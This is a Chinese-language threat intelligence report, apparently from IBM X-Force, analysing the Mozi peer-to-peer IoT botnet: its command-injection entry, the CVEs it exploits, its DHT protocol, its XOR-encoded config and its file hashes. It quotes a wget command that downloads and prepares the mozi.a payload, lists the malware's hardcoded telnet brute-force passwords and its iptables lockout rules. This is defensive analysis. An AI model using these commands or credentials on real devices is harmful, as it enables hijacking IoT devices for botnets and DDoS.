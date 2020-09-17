IBM X-Force 发现，威胁领域相对较新的参与者——Mozi 僵尸网络——已在物联网 (IoT) 设备中急剧蔓延。
该恶意软件自 2019 年末开始活跃，其代码与 Mirai 及其变种存在重叠。从 2019 年 10 月到 2020 年 6 月，Mozi 占据了观测到的物联网网络流量的近 90%。
这一惊人的市场占领伴随着物联网僵尸网络活动的整体激增，表明 Mozi 并未将竞争对手逐出市场。而是以洪水般的规模涌入市场，使其他变种的活动相形见绌。总体而言，从 2019 年 10 月（攻击开始显著增加）到 2020 年 6 月，IoT 攻击事件的总和比前两年的总和高出 400%。
IoT 攻击的激增可能由多种原因导致，但部分原因可能在于不断扩张的 IoT 环境为威胁行为者提供了更多目标。全球部署的 IoT 设备约有 310 亿台，且当前部署速率已达到每秒 127 台设备。
攻击者利用这些设备已有一段时间，最显著的是通过 Mirai 僵尸网络。IBM X-Force 事件响应与情报服务 (IRIS) 团队已对其进行了近四年的 追踪 。那么，为什么会出现突然的跃升？IBM 研究表明，Mozi 的持续成功在很大程度上得益于使用命令注入 (CMDi) 攻击，而这通常源于物联网设备的错误配置。IoT 使用的持续增长和不良的配置协议，很可能是导致这次跃升的罪魁祸首。新冠疫情导致企业网络远程访问更加频繁，可能进一步加剧了这一增长。
IoT 僵尸网络 可用于执行分布式拒绝服务 (DDoS) 攻击、窃取数据和发送垃圾邮件。可利用的 IoT 设备类型繁多：
如此可观的攻击面使组织极易受到 IoT 僵尸网络的攻击。再加上这些设备开箱即常常存在安全漏洞，且部署时加固措施松懈，风险进一步加剧。IoT 中最显著的漏洞来自 CMDi 攻击。
在 IBM 观察到的几乎所有针对 IoT 的攻击中，攻击者都试图使用 CMDi 攻击来初始入侵设备。如果目标端点是 IoT 设备且易受此类攻击，恶意负载便会被下载并执行。
CMDi 攻击在 IoT 设备中极为普遍，原因有以下几点。首先， IoT 嵌入式系统通常包含 Web 界面和固件开发遗留的调试界面，这些都可能被利用。其次，IoT Web 界面内置的 PHP 模块可被利用，使恶意行为者获得远程执行能力。第三， IoT 界面在部署时常常处于脆弱状态，因为管理员未能通过清理预期远程输入来加固界面。这使得威胁行为者能够输入如“wget”之类的 shell 命令。
我们的分析显示，Mozi 僵尸网络通过使用“wget” shell 命令来利用 CMDi，然后修改权限以允许威胁行为者与受影响的系统交互。例如：
wget http://xxx.xx.xxx.xxx/bins/mozi.a-o /var/tmp/mozi.a;chmod 777 /var/tmp/mozi.a;rm -rf /var/tmp/mozi.a
若主机存在 CMDi 漏洞，此命令将下载并执行名为“mozi.a”的文件。我们对这一特定样本的分析表明，该文件可在无互锁流水线级微处理器 (MIPS) 架构上执行。这是运行精简指令集计算机 (RISC) 架构的机器所能理解的扩展，该架构在许多物联网设备中普遍存在。攻击者通过僵尸网络完全控制设备后，可更改固件层级并在设备上植入其他恶意软件。
尽管此示例引用的是已知攻击向量，但其持续有效主要基于两个原因。首先，新漏洞使得通过 CMDi 的攻击尝试能持续更新，而缓慢的补丁实施过程可被利用。其次，此类活动易于自动化，使威胁行为者能以低成本快速攻击大批设备。
Mozi 僵尸网络的基础设施似乎主要源自中国，占观测到的基础设施的 84%。这一事实与 2020 年其他关于物联网活动的开源研究结论相符。
以下是 IBM 观测到的 Mozi 僵尸网络尝试利用的漏洞列表：
|漏洞
|受影响设备
|CVE-2017-17215
|华为 HG532
|CVE-2018-10561 / CVE-2018-10562
|GPON 路由器
|CVE-2014-8361
|使用 Realtek SDK 的设备
|Eir D1000 无线路由器 RCI
|Eir D1000 无线路由器
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi 未授权远程代码执行
|Netgear DGN1000
|MVPower DVR 命令执行
|MVPower DVR TV-7104HE
|CVE-2015-2051
|D-Link 设备
|D-Link UPnP SOAP 命令执行
|D-Link 设备
|闭路电视数字录像机供应商远程代码执行
|多家闭路电视数字录像机供应商
Mozi 僵尸网络是一种基于分布式松散哈希表 (DSHT) 协议的点对点 (P2P) 僵尸网络，可通过 IoT 设备漏洞和薄弱的 telnet 密码进行传播。
执行后，Mozi 僵尸网络会尝试绑定本地 UDP 端口 14737。该样本会读取 /proc/net/tcp 或 /proc/net/raw 文件，查找并终止使用端口 1536 和 5888 的进程。该样本同时检查 /usr/bin/python 文件是否存在。若存在，则将自身进程名更改为 sshd。否则，样本则将其进程名更改为 dropbear。
已知 Mozi 僵尸网络至少具有两大独有特征。一是使用 ECDSA384（椭圆曲线数字签名算法 384 位）验证自身完整性。二是复用了 Gafgyt 僵尸网络的部分代码。
该样本内含硬编码的 DHT 公共节点，可用于接入 P2P 网络。这些节点包括：
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Mozi 僵尸网络具备四大核心功能。实施 DDoS 攻击（支持 HTTP、TCP、UDP 协议）；执行命令攻击；从指定 URL 下载恶意负载并执行；收集僵尸程序信息。
下表包含所分析文件的高层详细信息。其中涵盖提交文件与残留文件。（残留文件指在恶意软件分析期间静态或动态提取的文件。）数据字段包括文件名、分析判定的文件类别、文件哈希值以及与本表中其他文件的文件关联关系。
|文件名
|文件类别
|文件哈希值
|父文件
|mozi.m
|僵尸网络
|4dde761681684d7edad4e5e1ffdb940b
|不适用
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|僵尸网络
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|僵尸网络
|9a111588a7db15b796421bd13a949cd4
|不适用
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|僵尸网络
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
执行时，该样本会尝试绑定本地 UDP 端口 14737。该样本通过读取 /proc/net/tcp 或 /proc/net/raw 文件，查找并终止占用端口 1536 与 5888 的进程。该样本会检测 /usr/bin/python 文件是否存在。若存在，则将自身进程名更改为 sshd。否则，样本则将其进程名更改为 dropbear：
该样本还会尝试更新访问控制列表以阻断 SSH 和 telnet 服务，防止其他僵尸网络利用这些服务。
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
同时会在 iptables 中随机选择硬编码端口进行设置：
Mozi 僵尸网络采用定制化的 DHT 协议构建其 P2P 网络。新 Mozi 节点加入 DHT 网络的过程如下：
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
样本需为当前节点生成 ID。根据 360 Netlab 关于 Mozi 的报告， “ID 长度为 20 字节，由样本内嵌的前缀 888888 或配置文件 [hp] 项指定的前缀，加上一个随机生成字符串构成”。配置文件示例如下：.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
为加入 DHT 网络，样本会向这些硬编码的 DHT 公共节点发送 ping 查询。包含节点 ID 的 ping 查询流量如下方 Wireshark 图所示
两个样本均使用定制版 UPX Packer 进行封装。该工具会将 p_info 结构体中的 p_file_size 和 p_blocksize 值清零。
该样本包含一个硬编码的配置文件，如下所示：
它包含四个部分：
配置数据使用硬编码的 XOR 密钥 4E665A8F80C8AC238DAC4706D54F6F7E 进行编码。解码后的配置数据显示如下：
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
配置数据支持多个命令，这些命令按以下标签进行标记：
|标签（命令）
|说明
|[ss]
|僵尸程序角色
|[ssx]
|启用/禁用标签 [ss]
|[cpu]
|CPU 架构
|[cpux]
|启用/禁用标签 [cpu]
|[nd]
|新 DHT 节点
|[hp]
|DHT 节点哈希前缀
|[atk]
|DDoS 攻击类型
|[ver]
|DHT 协议中 V 部分的值
|[sv]
|更新配置
|[ud]
|更新僵尸程序
|[dr]
|从指定 URL 下载并执行有效载荷
|[rn]
|执行指定命令
|[dip]
|下载 Mozi 僵尸程序的 ip:port
|[idp]
|报告僵尸程序
|[count]
|用于报告僵尸程序的 URL
Mozi 僵尸网络在 DDoS 攻击中复用了部分 Gafgyt 代码。它支持多种 DDoS 攻击类型，例如 HTTP、TCP 和 UDP。
ECDSA384 签名 1 用于验证配置数据的哈希值。用于验证的硬编码公钥为：
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
该公钥使用 XOR 密钥 4E665A8F80C8AC238DAC4706D54F6F7E 进行编码。解码后的公钥为：
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
配置版本用于决定何时更新僵尸程序。当该值大于当前值时，将触发僵尸程序更新。 ECDSA384 签名 2 用于验证配置文件的前三部分。用于验证的硬编码公钥为：
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
该公钥使用 XOR 密钥 4E665A8F80C8AC238DAC4706D54F6F7E 进行编码。解码后的公钥为：
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
除了通过漏洞利用获取受害者设备访问权限外，Mozi 僵尸网络还能使用硬编码的凭证列表暴力破解 telnet 登录凭据：
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
该样本使用的 telnet 登录暴力破解示例如下：
Mozi.m 和 Mozi.a
网络
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
显著字符串（解压后）
8.8.8.8 /proc/net/route Mozilla/4.0（兼容；MSIE 8.0；Windows NT 5.2；Trident/6.0）Mozilla/4.0（兼容；MSIE 10.0；Windows NT 6.1；Trident/5.0）Mozilla/4.0（兼容；MSIE 8.0；Windows NT 5.1；波兰语）Opera 11.00 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.0；英语）Opera 11.00 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.0；日语）Opera 11.00 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.1；德语）Opera 11.01 Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.1；法语）Opera 11.00 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0（Windows NT 10.0; Win64; x64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0（Windows NT 6.1；WOW64；rv:45.0）Gecko/20100101 Firefox/45.0 Mozilla/5.0（iPhone；CPU iPhone OS 8_4，如 Mac OS X）AppleWebKit/600.1.4（KHTML，如 Gecko）版本/8.0移动设备/12H143 Safari/600.1.4 Mozilla/5.0（Windows NT 6.1；WOW64；rv:41.0）Gecko/20100101 Firefox/41.0 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0（Macintosh；Intel Mac OS X 10_11）AppleWebKit/601.1.56（KHTML，如 Gecko）版本/9.0Safari/601.1.56 Mozilla/5.0（Macintosh；Intel Mac OS X 10_11_1）AppleWebKit/601.2.7（KHTML，如 Gecko）版本/9.0.1 Safari/601.2.7 Mozilla/5.0（Windows NT 6.1；WOW64；Trident/7.0；rv:11.0）如 Gecko Mozilla/4.0（兼容；MSIE 6.1；Windows XP）Opera/9.80（Windows NT 5.2；U；ru）Presto/2.5.22 版本/10.51Opera/9.80（X11；Linux i686；Ubuntu/14.10）Presto/2.12.388 版本/12.16 Mozilla/5.0（Macintosh；Intel Mac OS X 10_9_3）AppleWebKit/537.75.14（KHTML，如 Gecko）版本/7.0.3 Safari/7046A194A Mozilla/5.0（Windows NT 10.0；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0（Windows NT 6.1；WOW64）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0（Linux；Android 4.4.3）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/50.0.2661.89 移动设备 Safari/537.36 Mozilla/5.0（Linux；Android 4.4.3；HTC_0PCV2 Build/KTU84L）AppleWebKit/537.36（KHTML，如 Gecko）Version/4.0Chrome/33.0.0.0 移动设备 Safari/537.36 Mozilla/4.0（兼容；MSIE 8.0；X11；Linux x86_64；波兰语）Opera 11.00 Mozilla/4.0（兼容；MSIE 9.0；Windows 98；.NET CLR 3.0.04506.30）Mozilla/4.0（兼容；MSIE 9.0；Windows NT 5.1；Trident/5.0）Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.0；Trident/4.0；GTB7.4；InfoPath.3；SV1； .NET CLR 3.4.53360；WOW64；en-US） Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.1；Trident/4.0；FDM；MSIECrawler；Media Center PC 5.0） Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.1；Trident/4.0；GTB7.4；InfoPath.2；SV1； .NET CLR 4.4.58799；WOW64；en-US） Mozilla/4.0（兼容；MSIE 9.0；Windows NT 6.1；Trident/5.0；FunWebProducts） Mozilla/5.0（Macintosh；Intel Mac OS X 10.6；rv:25.0）Gecko/20100101 Firefox/25.0 Mozilla/5.0（Macintosh；Intel Mac OS X 10.8；rv:21.0）Gecko/20100101 Firefox/21.0 Mozilla/5.0（Macintosh；Intel Mac OS X 10.8；rv:24.0）Gecko/20100101 Firefox/24.0 Mozilla/5.0（Macintosh；Intel Mac OS X 10_10；rv:33.0）Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] 该节点不接受通告 dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
IoT 僵尸网络格局持续演变，IBM Security 数据显示威胁行为者在该领域仍保持活跃。随着 Mozi 等新兴僵尸网络组织扩大运营规模，以及 IoT 活动整体激增，使用 IoT 设备的组织必须认知到不断演变的威胁。IBM 观察到企业 IoT 设备正日益成为攻击者的目标。命令注入仍是威胁行为者首选的主要感染途径，这再次凸显了更改默认设备设置以及通过有效渗透测试发现并弥补防御短板的重要性。
Mozi.m 元数据
|文件名：
|Mozi.m
|文件大小：
|108,808 字节
|MD5：
|4dde761681684d7edad4e5e1ffdb940b
|SHA1：
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256：
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|文件类型：
|ELF 32 位 MSB 可执行文件，MIPS，MIPS-版本 1 (SYSV)，静态链接且去除了符号表信息
|类别：
|僵尸网络
|IRIS 名称：
|Mozi
|其他名称：
Mozi.a 元数据
|文件名：
|Mozi.a
|文件大小：
|95,268
|MD5：
|9a111588a7db15b796421bd13a949cd4
|SHA1：
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256：
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|文件类型：
|ELF 32 位 LSB 可执行文件，ARM，版本 1，静态链接且去除了符号表信息
|类别：
|僵尸网络
|IRIS 名称：
|Mozi
|其他名称：
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a 元数据
|文件名：
|d546_unpacked
|文件大小：
|266,108
|MD5：
|86d42d968d3d12c36722e16c78e49ffb
|SHA1：
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256：
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|文件类型：
|ELF 32 位 MSB 可执行文件，MIPS，MIPS-版本 1 (SYSV)，静态链接且去除了符号表信息
|类别：
|僵尸网络
|IRIS 名称：
|Mozi
|其他名称：
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d 元数据
|文件名：
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|文件大小：
|212,464
|MD5：
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1：
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256：
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|文件类型：
|b‘ELF 32 位 LSB 可执行文件，ARM，版本 1，静态链接且去除了符号表信息’
|类别：
|僵尸网络
|IRIS 名称：
|Mozi
|其他名称：